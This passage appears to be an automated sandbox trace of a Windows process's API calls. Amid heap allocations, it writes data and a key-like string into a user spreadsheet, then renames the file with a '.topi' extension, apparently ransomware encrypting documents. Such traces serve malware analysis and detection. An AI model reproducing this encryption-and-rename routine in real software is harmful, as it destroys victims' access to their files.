hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.172] GetCurrentThreadId () returned 0x8c4 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5c80 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.172] GetCurrentThreadId () returned 0x8c4 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.173] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93f0 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.174] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.174] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93c0 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.175] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.175] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93a8 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1968 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.177] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x8844, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x8844, lpOverlapped=0x0) returned 1 [0095.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.178] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8849, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.178] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.178] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.178] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.178] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.178] CloseHandle (hObject=0x6a8) returned 1 [0095.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.180] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yMP4dzVGPCH01lD1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymp4dzvgpch01ld1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yMP4dzVGPCH01lD1.xlsx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ymp4dzvgpch01ld1.xlsx.topi")) returned 1 [0095.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.181] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.182] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e89860, ftCreationTime.dwHighDateTime=0x1d57973, ftLastAccessTime.dwLowDateTime=0x8dafb3e0, ftLastAccessTime.dwHighDateTime=0x1d53c20, ftLastWriteTime.dwLowDateTime=0x8dafb3e0, ftLastWriteTime.dwHighDateTime=0x1d53c20, nFileSizeHigh=0x0, nFileSizeLow=0x8849, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yMP4dzVGPCH01lD1.xlsx", cAlternateFileName="YMP4DZ~1.XLS")) returned 0 [0095.182] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.182] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.183] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 